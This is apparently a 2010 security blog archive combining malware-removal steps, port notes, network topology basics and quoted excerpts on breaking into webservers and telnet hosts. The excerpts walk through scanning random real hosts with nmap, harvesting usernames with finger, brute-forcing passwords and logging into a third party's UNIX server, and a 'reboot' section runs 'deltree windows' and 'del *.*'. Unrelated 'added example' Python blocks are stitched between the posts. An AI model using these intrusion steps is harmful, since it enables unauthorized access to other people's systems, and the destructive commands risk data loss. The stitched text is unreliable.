Wednesday, June 30, 2010

AVENGER

File Behavior

AVENGER.EXE has been seen to perform the following behavior:

* The Process is packed and/or encrypted using a software packing process
* Adds a Registry Key (RUNONCE) to auto start Programs on system start up
* Creates a new Background Service on the machine
* This process creates other processes on disk
* This Process Deletes Other Processes From Disk
* Adds a Registry Key (RUN) to auto start Programs on system start up
* Registers a Dynamic Link Library File
* Executes a Process
* Found on infected systems and resists interrogation by security products
* Uses low level functions to hide itself from the user and from system/security processes


AVENGER.EXE has been the subject of the following behavior:

* Executed as a Process
* Has code inserted into its Virtual Memory space by other programs
* Created as a process on disk
* Executed from Temporary Folders
* Deleted as a process from disk
* Terminated as a Process


Please download The Avenger by Swandog46 to your Desktop.

* Double click on Avenger.zip to open the file and extract avenger.exe to your Desktop.
* Copy the text quoted below (which is a script for Avenger) into your clipboard by highlighting it and pressing CTRL+C.
* Now run The Avenger program by double clicking its icon on your Desktop.
* Under "Script file to execute" choose "Input Script Manually".
* Now click on the Magnifying Glass icon, which will open a new window titled "View/edit script".
* Paste the text copied to the clipboard into this window by pressing Ctrl+V.

Files to delete:
%Windir%\System32\askearth17.exe
%Windir%\System32\ei.exe
%Windir%\System32\filgmo.exe
%Windir%\system32\iniwin32.dll
%Windir%\System32\pruttct.exe
%Windir%\System32\prutpct.exe
%Windir%\System32\prutsct.exe
%Windir%\System32\ptech.exe
%Windir%\System32\skytown.exe
%ProgramFiles%\data19
%Windir%\pi1.exe
%UserProfile%\Desktop\askearth17.exe
%UserProfile%\Desktop\ei.exe
%UserProfile%\Desktop\filgmo.exe
%UserProfile%\Desktop\prutpct.exe
%UserProfile%\Desktop\prutsct.exe
%UserProfile%\Desktop\ptech.exe
%UserProfile%\Desktop\skytown.exe
%UserProfile%\Local Settings\Temp\ei.exe

Folders to delete:
C:\PROGRAM FILES\E2G
C:\PROGRAM FILES\Windows AdStatus

Registry values to replace with dummy:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_DLLs

Registry keys to delete:

HKLM\software\e2g
HKLM\software\microsoft\windows\currentversion\explorer\browser helper objects\{3643abc2-21bf-46b9-b230-f247db0c6fd6}


* Click Done
* Now click on the Green Light to begin execution of the script
* Answer "Yes" twice when prompted.

The Avenger will automatically do the following:

* It will restart your computer. (When the script being executed contains "Drivers to Unload", The Avenger will actually reboot your system two times.)
* On reboot, it will briefly open a black command window on your desktop; this is normal.
* After the reboot, it creates a log file that should open with the results of Avenger's actions. This log file will be located at C:\avenger.txt.
* The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped them and moved the zip archives to C:\avenger\backup.zip.
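As an added example (not part of The Avenger or this post), the following Python parses a script in the format shown above into a reviewable plan before anything is deleted: it recognises the section headings, expands %Windir%-style variables from a supplied map (the variable values and the sample script excerpt are constructed), splits "key | value" lines, and flags any entry that would wipe a drive root or the Windows folder itself.

```python
import re

# Section headings Avenger scripts use (as in the script above); matched
# case-insensitively and without the trailing colon.
SECTIONS = {
    "files to delete": "file",
    "folders to delete": "folder",
    "registry values to replace with dummy": "regvalue",
    "registry keys to delete": "regkey",
    "drivers to unload": "driver",
}

# Constructed expansions for the %Var% tokens the script relies on.
SAMPLE_ENV = {
    "Windir": r"C:\WINDOWS",
    "ProgramFiles": r"C:\Program Files",
    "UserProfile": r"C:\Documents and Settings\user",
}

# Constructed excerpt of the script above, used for a dry run.
SAMPLE_SCRIPT = r"""
Files to delete:
%Windir%\System32\askearth17.exe
%UserProfile%\Local Settings\Temp\ei.exe

Folders to delete:
C:\PROGRAM FILES\E2G

Registry values to replace with dummy:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_DLLs

Registry keys to delete:
HKLM\software\e2g
"""

_VAR = re.compile(r"%([A-Za-z0-9_]+)%")


def expand(path, env):
    """Expand %Var% tokens case-insensitively; unknown tokens are left as they are."""
    lowered = {k.lower(): v for k, v in env.items()}
    return _VAR.sub(lambda m: lowered.get(m.group(1).lower(), m.group(0)), path)


def parse_avenger_script(text, env):
    """Return (action, target, detail) tuples in script order.

    detail carries the value name for 'regvalue' entries and is None otherwise.
    """
    plan, action = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        heading = line.rstrip(":").lower()
        if heading in SECTIONS:
            action = SECTIONS[heading]
            continue
        if action is None:
            raise ValueError(f"entry before any section heading: {line!r}")
        if action == "regvalue":
            if "|" not in line:
                raise ValueError(f"expected 'key | value name': {line!r}")
            key_path, value_name = (p.strip() for p in line.split("|", 1))
            plan.append((action, key_path, value_name))
        elif action in ("file", "folder"):
            plan.append((action, expand(line, env), None))
        else:
            plan.append((action, line, None))
    return plan


def risky_entries(plan):
    """Return file/folder targets that would wipe a drive root or Windows itself."""
    risky = []
    for action, target, _ in plan:
        if action not in ("file", "folder"):
            continue
        norm = target.rstrip("\\").lower()
        if re.fullmatch(r"[a-z]:", norm) or norm.endswith((":\\windows", ":\\windows\\system32")):
            risky.append(target)
    return risky


if __name__ == "__main__":
    plan = parse_avenger_script(SAMPLE_SCRIPT, SAMPLE_ENV)
    for entry in plan:
        print(entry)
    print("risky:", risky_entries(plan))
```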

Please attach the c:\avenger.txt file to your next message. Now continue with the below fixes!

Copy the text below (from REGEDIT4 to the last line) to Notepad. Save it as fixE2G.reg to your desktop. Be sure the "Save as type" is set to "All files". Once you have saved it, double click it and allow it to merge with the registry.

REGEDIT4


[-HKEY_CURRENT_USER\SOFTWARE\PTech]
[-HKEY_CLASSES_ROOT\AppID\{3B99F202-145A-4E5A-AC7B-88A36910BF5E}]
[-HKEY_CLASSES_ROOT\AppID\IeBHOs.DLL]
[-HKEY_CLASSES_ROOT\IeBHOs.Control.1]
[-HKEY_CLASSES_ROOT\IeBHOs.Control]
[-HKEY_CLASSES_ROOT\Interface\{8F0A06F6-DF4D-4D54-B8CA-E8EEDBAE6DDB}]
[-HKEY_CLASSES_ROOT\TypeLib\{3B99F202-145A-4E5A-AC7B-88A36910BF5E}]
[-HKEY_CLASSES_ROOT\CLSID\{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}]
[-HKEY_CLASSES_ROOT\CLSID\{4A5B0528-1EE4-4871-8546-AB34DF31E861}]
[-HKEY_CLASSES_ROOT\CLSID\{4A5B0D43-13BE-4B7C-820E-660CED71CDBF}]
[-HKEY_CLASSES_ROOT\CLSID\{4A5B482D-E087-43C9-8FD6-0F36510CF2B9}]
[-HKEY_CLASSES_ROOT\CLSID\{4A5ADB4F-48EE-4840-8DAB-166A239F7E86}]
[-HKEY_LOCAL_MACHINE\Software\Classes\CLSID\[Random CLSID]
[-HKEY_LOCAL_MACHINE\Software\E2G]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\e2g Plugin]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\e2g plugin]
[-HKEY_LOCAL_MACHINE\Software\Classes\AppID\{3B99F202-145A-4E5A-AC7B-88A36910BF5E}]
[-HKEY_LOCAL_MACHINE\Software\Classes\AppID\IeBHOs.DLL]
[-HKEY_LOCAL_MACHINE\Software\Classes\IeBHOs.Control.1]
[-HKEY_LOCAL_MACHINE\Software\Classes\IeBHOs.Control]
[-HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{3B99F202-145A-4E5A-AC7B-88A36910BF5E}]
[-HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}]


Run HijackThis and select the following lines, but DO NOT CLICK FIX until you exit all browser sessions, including the one you are reading in right now:

O2 - BHO: CControl Object - {3643ABC2-21BF-46B9-B230-F247DB0C6FD6} - C:\Program Files\E2G\IeBHOs.dll
O20 - AppInit_DLLs: iniwin32.dll

Tuesday, June 29, 2010

HOW TO REBOOT A COMPUTER

I use this procedure instead of fdisk or format when I have a problem or virus and don't want to lose data, especially the info I keep in My Documents:

Boot from the Windows Me boot disk.

At A:\ type [C:\] [enter]
At C:\ type [deltree windows] [enter] (this will take some time)
At C:\ type [attrib -s -h -r] [enter]
At C:\ type [del *.*] [enter]
Press [Ctrl]+[Alt]+[Del] and let the computer restart with the boot disk.

Ensure your BIOS is set to boot off the floppy drive, CD-ROM drive, and HDD, in this order, before you start this hassle.

When you restart your computer, make sure you select the option to start with CD-ROM support.

Type X:\setup where "X" is the drive designation of the cdrom that contains your Me install disk. e.g., if it used to be e:, now it will be f:

Me will now give you a fresh install; however, the data on your drives will remain intact.

TCP PORT 139

NetBIOS Session Service is used for resource sharing on Windows 9x, ME and NT. This is the port that is used to connect to file shares, for example.

Inbound Traffic
Inbound scans are typically from systems which are trying to connect to file shares that might be available on your system, and hence these should be blocked. While most of this traffic is the result of worms or viruses which can use open file shares to propagate, it can also be the result of malicious users attempting to connect to your computer. Once connected, they can download, upload, or even delete or edit files on the connected file share.

If you use open file shares (including sharing of printers, etc.) on your local network (LAN), then you should be using a firewall so that your local file shares are not accessible from the internet.

Connecting to open file shares is probably the easiest and most common hack on the internet, and yet one of the most effective for malicious activities such as identity theft or installing RATs (Remote Access Trojans) to take control of systems remotely.

Outbound Traffic

Outbound scans, if occurring in volume, should be considered an indication of a possible worm infection on the source computer and should be investigated. If there are systems to which you connect remotely, those systems should be marked as trusted IPs within Link Logger so that future authorized events are logged as normal traffic.
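As an added example (not from the original post or from Link Logger), the following Python applies the rules above to constructed firewall log lines: inbound port-139 connections from the internet that were allowed through are reported, outbound connections to a caller-supplied trusted IP list count as normal traffic, and a LAN host that probes many distinct remote hosts on 139 is flagged as a possible worm infection. The log format, addresses and threshold are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed addressing for this example: the home LAN behind the firewall
# and one remote system the user legitimately connects to (the "trusted IP").
LAN = ipaddress.ip_network("192.168.1.0/24")
TRUSTED_IPS = {"198.51.100.20"}
# A LAN host that probes this many distinct remote hosts on 139 is reported
# as a possible worm infection to investigate.
OUTBOUND_SCAN_THRESHOLD = 5

# Constructed firewall log format:
# "<date> <time> TCP <src>:<sport> -> <dst>:<dport> <ALLOW|DROP>"
_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) TCP (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<verdict>ALLOW|DROP)$"
)

SAMPLE_LOG = """\
2010-06-29 08:00:01 TCP 203.0.113.7:4123 -> 192.168.1.10:139 DROP
2010-06-29 08:00:05 TCP 203.0.113.8:3310 -> 192.168.1.10:139 DROP
2010-06-29 08:01:00 TCP 203.0.113.9:2201 -> 192.168.1.12:139 ALLOW
2010-06-29 08:02:00 TCP 192.168.1.10:1031 -> 198.51.100.20:139 ALLOW
2010-06-29 08:02:10 TCP 192.168.1.12:1040 -> 203.0.113.30:139 DROP
2010-06-29 08:02:11 TCP 192.168.1.12:1041 -> 203.0.113.31:139 DROP
2010-06-29 08:02:12 TCP 192.168.1.12:1042 -> 203.0.113.32:139 DROP
2010-06-29 08:02:13 TCP 192.168.1.12:1043 -> 203.0.113.33:139 DROP
2010-06-29 08:02:14 TCP 192.168.1.12:1044 -> 203.0.113.34:139 DROP
2010-06-29 08:02:15 TCP 192.168.1.12:1045 -> 203.0.113.35:139 DROP
2010-06-29 08:03:00 TCP 192.168.1.10:1050 -> 203.0.113.40:80 ALLOW
"""


def parse_event(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = _LINE.match(line.strip())
    return m.groupdict() if m else None


def triage_port139(log_text):
    """Sort every port-139 connection in the log into the three buckets above.

    Returns a dict with:
      inbound_unblocked - (src, dst) pairs where an outside host reached a LAN share
      outbound_suspects - {lan_host: number of distinct remote hosts it probed}
      trusted_sessions  - outbound connections to TRUSTED_IPS (normal traffic)
    """
    inbound_unblocked = []
    outbound = defaultdict(set)
    trusted_sessions = 0
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None or ev["dport"] != "139":
            continue
        src_lan = ipaddress.ip_address(ev["src"]) in LAN
        dst_lan = ipaddress.ip_address(ev["dst"]) in LAN
        if dst_lan and not src_lan:
            # Inbound from the internet: the firewall should have dropped it.
            if ev["verdict"] == "ALLOW":
                inbound_unblocked.append((ev["src"], ev["dst"]))
        elif src_lan and not dst_lan:
            if ev["dst"] in TRUSTED_IPS:
                trusted_sessions += 1
            else:
                outbound[ev["src"]].add(ev["dst"])
    suspects = {src: len(dsts) for src, dsts in outbound.items()
                if len(dsts) >= OUTBOUND_SCAN_THRESHOLD}
    return {"inbound_unblocked": inbound_unblocked,
            "outbound_suspects": suspects,
            "trusted_sessions": trusted_sessions}


if __name__ == "__main__":
    for bucket, value in triage_port139(SAMPLE_LOG).items():
        print(f"{bucket}: {value}")
```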

PORT 139 – Information

* Port Number: 139
* TCP / UDP: TCP
* Delivery: Yes
* Protocol / Name: [Malware known as Qaz]
* Port Description: [malware info: Qaz]
* Virus / Trojan: Yes, Caution!


TCP port 139 uses the Transmission Control Protocol. TCP is one of the main protocols in TCP/IP networks. Whereas the IP protocol deals only with packets, TCP enables two hosts to establish a connection and exchange streams of data. TCP guarantees delivery of data and also guarantees that packets will be delivered on port 139 in the same order in which they were sent. Guaranteed communication over port 139 is the key difference between TCP and UDP. UDP port 139 would not have guaranteed communication in the same way as TCP.

That TCP port 139 was flagged as a virus (colored red) does not mean that a virus is using port 139, but that a Trojan or virus has used this port in the past to communicate.

Monday, June 28, 2010

HTTPS(Secure Sockets Layer (SSL2))(443TCP)


Friday, June 25, 2010

HTTP (80 TCP)


From "Breaking into computer networks from the Internet" [Roelof Temmingh & SensePost]:

Webservers are interesting beings - they are the most common service on the Internet - there are many of these running around. The two most common webservers are Microsoft IIS and Apache. They run respectively on Windows and UNIX (although Apache is available for Windows as well)...but you knew this, right? In most cases (except for one) one generally cannot get full control over a webserver - it is thus, in terms of control, a less "vulnerable" service than telnet. The problem nowadays with webservers is that they serve a whole lot of data - that is, a lot of them contain data that is just as sensitive as the data that you will find on a corporate internal fileserver. The attacks on webservers can be categorized as attacks that return data that the server should not be returning (e.g. abusing your rights on the server), executing commands on the server (even taking control of the server), and stopping the server (denial of service attacks). There are many tools out there that will scan a server for exploitable CGIs (these include PERL scripts, DLLs, EXEs, PHPs and others) as well as look for interesting directories or files. The tool we prefer (and we think a lot of people will agree) is something called whisker (by Rain Forest Puppy, get it here: http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=1). The latest version of whisker is version 1.4. Whisker is a PERL script that does intelligent scanning of webservers. We don't want to go into too much detail of the inner workings of the scanner - there is plenty of documentation on RFP's site - the bottom line is that whisker is highly configurable and very effective. One of the more useful features of whisker is that it uses a vulnerability "database" - thus the engine uses "plugins", and the plugins can be updated. The security community adds new "signatures" every now and again to the database - this keeps the scanner current with all the new vulnerabilities that are discovered.

How do we use whisker? Give me a practical example! OK - let us assume that we want to scan a webserver somewhere. Let's begin with a straightforward IIS webserver - no authentication, no SSL, no special cleanup, and no IDS - just static pages. We start whisker as follows:
perl whisker.pl -h 196.xxx.183.2
This host happens to be the primary MX record for the domain xxx.co.za. If we can control this host, we can probably also get some interesting data. The server was chosen because it does not host virtual websites, and is a stock standard IIS version 4.0 server - with no additional data. Its primary function is that of mail serving - not serving webpages. The output looks like this:
-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net --
= - = - = - = - = - =
= Host: 196.xxx.183.2
= Server: Microsoft-IIS/4.0
+ 200 OK: GET /msadc/Samples/selector/showcode.asp
+ 200 OK: GET /msadc/samples/adctest.asp
+ 200 OK: GET /iisadmpwd/aexp4b.htr
+ 200 OK: HEAD /msadc/msadcs.dll
+ 200 OK: HEAD /_vti_inf.html
+ 200 OK: HEAD /_vti_bin/shtml.dll
+ 200 OK: HEAD /_vti_bin/shtml.exe


We can see that this host has a few vulnerabilities - maybe the most serious of them is that it hosts "msadcs.DLL". Abusing this DLL one can gain complete control of the server. The "Showcode.asp" ASP can be used to view any file on the same drive as the webroot, and the "aexp4b.htr" can be used to do brute force password attacks on the server. The scope of this paper is not to describe every one of the 300-odd vulnerabilities that whisker tests for. We will rather concentrate on different scan types, bypassing IDS systems, connecting to SSL-enabled servers, and brute forcing authentication systems.

Let's look at some of the parameters that can be passed to whisker, and how we would use them (at this stage of the discussion the reader should REALLY try to read RFP's whisker documentation - get it here: http://www.wiretrip.net/rfp/bins/whisker/whisker.txt. We will only look at the common switches). One of the switches that is very useful is the "-V" switch - this tells whisker that the target is a virtually hosted site, and it will thus add the "Host: XXX" entry in the HTTP header. But - how do we know if a site is virtually hosted? Let us assume that I want to find out if the site www.sensepost.com is virtually hosted. The forward entry for www.sensepost.com is 216.0.48.55. When I open a browser and enter the IP address 216.0.48.55 I get to a totally different website. The webserver running on 216.0.48.55 thus looks at the HTTP header and decides what should be served - a virtually hosted site. Should I test for URLs (say brute forcing URLs) with whisker, we would thus add the -V switch, and specify the DNS name - not the IP number. If we should specify the IP number we will not be looking at the website www.sensepost.com, but at the underlying webserver - which might not be a bad idea, but maybe not the true intention. Hey - did I mention to read the whisker manual? Another switch that is used frequently is the -I switch. The -I switch fires up whisker's stealth mode - the IDS bypassing module. How does an IDS work? It looks for patterns or signatures. If we can disguise our patterns the IDS may not detect them. The -I switches disguise whisker's attacks in many ways
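As an added example (not from the paper or from whisker), the following Python is the defender's side of the scan above: it reads web-server log lines in common log format (constructed here), normalises request paths by URL-decoding and lower-casing, since IIS paths are case-insensitive and an encoded path decodes to the same file, flags clients that request several of the paths whisker reported, and lists which of those paths the server actually answered with 200, which is the list to clean up.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Paths from the whisker run above that indicate exposed sample/admin content.
# Compared after lower-casing and URL-decoding so that mixed case or
# %-encoded requests for the same file are not missed.
WATCHLIST = {
    "/msadc/msadcs.dll",
    "/msadc/samples/adctest.asp",
    "/msadc/samples/selector/showcode.asp",
    "/iisadmpwd/aexp4b.htr",
    "/_vti_inf.html",
    "/_vti_bin/shtml.dll",
    "/_vti_bin/shtml.exe",
}

# Common log format: client - - [time] "METHOD path HTTP/x" status size
_CLF = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+$'
)

# Constructed web-server log lines: one client probing, one normal visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Jun/2010:10:00:00 +0200] "GET /index.html HTTP/1.0" 200 512
203.0.113.5 - - [25/Jun/2010:10:00:01 +0200] "GET /MSADC/Samples/SELECTOR/showcode.asp HTTP/1.0" 200 1204
203.0.113.5 - - [25/Jun/2010:10:00:01 +0200] "HEAD /msadc/msadcs.dll HTTP/1.0" 200 0
203.0.113.5 - - [25/Jun/2010:10:00:02 +0200] "GET /iisadmpwd/aexp4b.htr HTTP/1.0" 404 0
203.0.113.5 - - [25/Jun/2010:10:00:02 +0200] "HEAD /_vti_bin/shtml%2Eexe HTTP/1.0" 200 0
198.51.100.9 - - [25/Jun/2010:10:05:00 +0200] "GET /index.html HTTP/1.0" 200 512
198.51.100.9 - - [25/Jun/2010:10:05:01 +0200] "GET /_vti_inf.html HTTP/1.0" 200 0
"""


def normalise(path):
    """Drop the query string, URL-decode twice (for doubled encoding), lower-case."""
    path = path.split("?", 1)[0]
    return unquote(unquote(path)).lower()


def parse_clf(line):
    """Return the fields of one common-log-format line, or None if it does not match."""
    m = _CLF.match(line.strip())
    return m.groupdict() if m else None


def watchlist_hits(log_text):
    """Return {client: set of normalised watchlist paths that client requested}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_clf(line)
        if ev is None:
            continue
        p = normalise(ev["path"])
        if p in WATCHLIST:
            hits[ev["client"]].add(p)
    return dict(hits)


def scanner_candidates(log_text, min_distinct=3):
    """Clients that touched at least min_distinct watchlist paths (scan-like behaviour)."""
    return sorted(c for c, paths in watchlist_hits(log_text).items()
                  if len(paths) >= min_distinct)


def exposed_paths(log_text):
    """Watchlist paths the server actually answered with 200: the remediation list."""
    found = set()
    for line in log_text.splitlines():
        ev = parse_clf(line)
        if ev and ev["status"] == "200":
            p = normalise(ev["path"])
            if p in WATCHLIST:
                found.add(p)
    return sorted(found)


if __name__ == "__main__":
    print("scan-like clients:", scanner_candidates(SAMPLE_LOG))
    print("exposed paths:", exposed_paths(SAMPLE_LOG))
```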

Computer Network Topology

Computer network topologies can be categorized as follows:
• bus
• star
• ring
• mesh
• tree



Bus Topology


Bus topology uses a common backbone to connect all the network devices in a linear shape. A single cable functions as the shared communication medium for all the devices attached to it with an interface connector. A device which wants to communicate sends a broadcast message to all the devices attached to the shared cable, but only the intended recipient actually accepts and processes that message.


Ethernet bus topologies are easy to install and don't require much cabling; only a main shared cable is used for network communication. 10Base-2 and 10BaseT are two popular types of Ethernet cable used in the bus topology. However, a bus network works only with a limited number of devices: performance issues are likely to occur if more than 12-15 computers are added to a bus network. Additionally, if the backbone cable fails then the whole network becomes useless and communication fails among all the computers, unlike in the star topology, where if one computer is detached from the network there is no effect on the other computers.

Ring Topology


In a ring network, every computer or device has two adjacent neighbors for communication. All the communication messages travel in the same direction, whether clockwise or anticlockwise. Damage to any cable or device can result in the breakdown of the whole network. Ring topology has now become almost obsolete.
FDDI, SONET or Token Ring technology can be used to implement a ring network. Ring topologies can be found in offices, schools or small buildings.

Star Topology

In the computer networking world, the most commonly used topology in a LAN is the star topology. Star topologies can be implemented in homes, offices or even in a whole building. All the computers in a star topology are connected to a central device such as a hub, switch or router. The functionality of each of these devices is different; I have covered the details of each networking device in a separate portion of my website. Computers in a network are usually connected to the hub, switch or router with Unshielded Twisted Pair (UTP) or Shielded Twisted Pair cables.

As compared to the bus topology, a star network requires more devices and cables to complete a network. The failure of a single node or cable in a star network won't take down the entire network, as it would in the bus topology.

However, if the central connecting device such as the hub, switch or router fails for any reason, then ultimately the whole network can come down or collapse.

Tree Topology

Tree topologies integrate multiple star topologies together onto a bus. Only the hub devices can connect directly to the tree bus, and each hub functions as the root of a tree of network devices. This bus/star hybrid combination supports future expansion of the computer network much better than a bus or star alone.

Mesh Topology


Mesh topology works on the concept of routes. In a mesh topology, a message sent to a destination can take any of the possible shortest, easiest routes to reach it. In the previous topologies, star and bus, messages are usually broadcast to every computer, especially in the bus topology; similarly, in the ring topology a message can travel in only one direction, i.e. clockwise or anticlockwise. The Internet employs the mesh topology, and a message finds its route to its destination; routers find the routes for the messages and deliver them to their destinations. The topology in which every device connects to every other device is called a full mesh topology, unlike the partial mesh, in which a device may be connected to the other devices only indirectly.
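As an added example (not part of the original text), the following Python models the topologies above as small graphs and checks the failure claims made for them: which single node or cable failure takes the whole network down, how many PCs keep communicating afterwards, and how many cables each design needs (a full mesh needs n(n-1)/2). The ring is modelled as a one-way loop, matching the single-direction description; the PC and device names are constructed.

```python
from collections import deque
from itertools import combinations


def _link(graph, a, b, directed=False):
    """Add a cable between a and b (one-way only when directed=True)."""
    graph.setdefault(a, set()).add(b)
    graph.setdefault(b, set())
    if not directed:
        graph[b].add(a)


def bus(n):
    """n PCs tapped onto one shared backbone cable."""
    g = {}
    for i in range(n):
        _link(g, f"pc{i}", "backbone")
    return g


def star(n):
    """n PCs each cabled to a central hub or switch."""
    g = {}
    for i in range(n):
        _link(g, f"pc{i}", "hub")
    return g


def ring(n):
    """One-way loop: frames travel in a single direction, as in Token Ring."""
    g = {}
    for i in range(n):
        _link(g, f"pc{i}", f"pc{(i + 1) % n}", directed=True)
    return g


def full_mesh(n):
    """Every PC cabled directly to every other PC: n(n-1)/2 links."""
    g = {}
    for a, b in combinations(range(n), 2):
        _link(g, f"pc{a}", f"pc{b}")
    return g


def link_count(graph):
    """Number of distinct cables (a two-way link is counted once)."""
    return len({frozenset((a, b)) for a in graph for b in graph[a]})


def working_group(graph, failed_nodes=(), failed_links=()):
    """(largest set of surviving PCs that can all still talk to each other, surviving PCs).

    A PC counts as talking to another only if messages get through in both
    directions, so a one-way ring with a single break collapses to groups of 1.
    """
    dead = set(failed_nodes)
    cut = {tuple(link) for link in failed_links}

    def reachable_from(start):
        seen, queue = {start}, deque([start])
        while queue:
            u = queue.popleft()
            for v in graph[u]:
                if v in dead or v in seen or (u, v) in cut or (v, u) in cut:
                    continue
                seen.add(v)
                queue.append(v)
        return seen

    pcs = [h for h in graph if h.startswith("pc") and h not in dead]
    reach = {h: reachable_from(h) for h in pcs}
    largest = max((sum(1 for k in pcs if k in reach[h] and h in reach[k]) for h in pcs),
                  default=0)
    return largest, len(pcs)


if __name__ == "__main__":
    print("bus, backbone cut:", working_group(bus(5), failed_nodes=["backbone"]))
    print("star, hub failed:", working_group(star(5), failed_nodes=["hub"]))
    print("star, one cable cut:", working_group(star(5), failed_links=[("pc0", "hub")]))
    print("ring, one cable cut:", working_group(ring(5), failed_links=[("pc1", "pc2")]))
    print("full mesh of 6 needs", link_count(full_mesh(6)), "cables")
```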

Thursday, June 24, 2010

TCP (Transmission Control Protocol): telnet (TCP 23)

Telnet (23 TCP)

TCP works at the transport layer.
The most prized port to find open could be the telnet port. An open telnet port usually denotes a UNIX host or a router. Sometimes an AS400 or mainframe could be found. Why are we excited about an open telnet port? The reason is twofold. First - the host may contain sensitive data in directories that are not properly protected - see the section on "finding the goods". The second reason is that UNIX hosts are the ideal "relaunch" platform. What I mean by this is that you should be able to upload your entire "toolbox" to the server, so that you are able to attack hosts that are usually firewalled or not routed from this server. Even if you are not able to upload a toolbox you should be able to telnet to other (internal) servers from a router or a UNIX server. How do we go about getting a shell (or router prompt)? Usually a username and a password are required. In some cases only a username is needed, and in some cases only a password is needed, as for Cisco routers. The bottom line is that we need two or fewer "things" - be that a username or a password. How do we find these two things? There are some techniques to find a username (many of these techniques were used in our previous penetration testing example, so I will not show input/output):
1. Some routers or UNIX hosts will tell you when you have entered an incorrect username - even if you don't provide a password.
2. Telnet to port 25 and try to issue EXPN and VRFY commands. Try to expand (EXPN) list-like aliases such as abuse, info, list, all etc. In many cases these point to valid usernames.
3. Try to finger a user on the host. Later in this document we will look at finger techniques :)
4. Try anonymous FTP and get the password file in /etc. Although it should be shadowed, it may reveal valid usernames.
5. Try anonymous FTP and do a cd ~user_to_test_for - see the section on FTP.
6. Use default usernames. A nice list of default usernames and passwords can be found at www.nerdnet.com/security/index.php
7. Try common usernames such as "test", "demo", "test01" etc.
8. Use the hostname or a derivative of the hostname as username.
9. See if the host is running a webserver and have a look at the website - you might learn more than you expect - look at the "Contact" section and see if you can't mine some usernames. Looking at the website may also help you to guess common usernames.

Ok, so now you have a rather long list of possible usernames. The idea would be to verify that these users exist; it would be a bonus if you could. If we cannot verify that a user is valid we have to test it via the telnet protocol. We still need a password. Unfortunately there is no easy way to verify a password - you have to test this manually.
Manually?! I don't think so! BindView Corporation's RAZOR security team provided the world with VLAD, a tool that packaged some very useful tools. One of these tools has the ability to test usernames and passwords for (amongst other things) telnet. (The tool does not have support for password-only telnet daemons - such as some routers - but the author tells me they are looking into it.) Without getting too involved in this tool, let's see how our technique works against an arbitrary host (to find a totally arbitrary host we use nmap to find a random host with open port 23: nmap -sT -iR -p 23). Nmap finds the site 216.xxx.162.79 open to telnet:
/tmp# telnet 216.xxx.162.79
Trying 216.xxx.162.79...
Connected to 216.xxx.162.79.
Escape character is '^]'.
SunOS 5.6
xxx.xxx.com
Welcome to xxxxxxxxxxxxx
force Running Solaris 2.6.0

login:
We telnet to port 25, and find that there is no mail daemon running - no EXPN or VRFY possibilities. It seems that there is no anonymous FTP - no getting the password file. The finger daemon is also not running. Let us leave this host alone - we don't want to offend XXX - they have implemented some measures to keep people out.
Another IP that nmap gives us is 216.xxx.140.132. This host (SCO UNIX) is running Sendmail and finger. When we do a finger command, we find many usernames. To get these into a single file we issue the following command:
finger @216.xxx.140.132 | awk '{print $1}' | uniq > usernames
The next step would be to see if we can use these usernames with common passwords. We use VLAD's brute force telnet module as follows, with the usernames in the file account.db:
perl pwscan.pl -v -T 216.xxx.140.132
The output of the pwscan.pl PERL script looks like this:
/ports/vlad-0.7.1# perl pwscan.pl -v -T 216.xxx.140.132
RAZOR password scanner - version: $Id: pwscan.pl,v
loveless Exp $
Checking 216.xxx.140.132
telnet check. User:angela, pass:angela
telnet check. User:angela, pass:
telnet check. User:angela, pass:12345
telnet check. User:angela, pass:abcdef
telnet check. User:angela, pass:god
telnet check. User:angela, pass:guess
telnet check. User:angela, pass:none
telnet check. User:angela, pass:password
telnet check. User:angela, pass:qwerty
telnet check. User:angela, pass:secret
telnet check. User:angela, pass:sex
telnet check. User:angela, pass:test

---cut---
Running through all usernames and common passwords, we find... nothing. No username could be brute forced. Now what? The next step is to find more usernames. We attempt the following:
finger test@216.xxx.140.132
The output looks like this:
/tmp# finger test@216.xxx.140.132
[216.xxx.140.132]
Login name: test In real life: TEST ACCOUNT
Directory: /home/test Shell: /OpenServer/bin/sh
Never logged in.
No unread mail
No Plan.

Login name: monotest In real life: Monorail Test
Directory: /home/monotest Shell: /OpenServer/bin/sh
pts038
No unread mail
No Plan.
This looks promising. The "test" user does not seem to have a weak password - we test it manually. The "monotest" user however delivers: logging in with username "monotest" and password "monotest" we gain access to the UNIX host:
/tmp# telnet 216.xxx.140.132
Trying 216.xxx.140.132...
Connected to xxxx.com.
Escape character is '^]'.
SCO UnixWare 7.1.0 (xxxx) (pts/42)
login: monotest
Password:
UnixWare 7.1.0
musapp


RESTRICTED RIGHTS LEGEND:
When licensed to a U.S., State, or Local Government,
all Software produced by SCO is commercial computer software
as defined in FAR 12.212, and has been developed exclusively
at private expense. All technical data, or SCO commercial
computer software/documentation is subject to the provisions
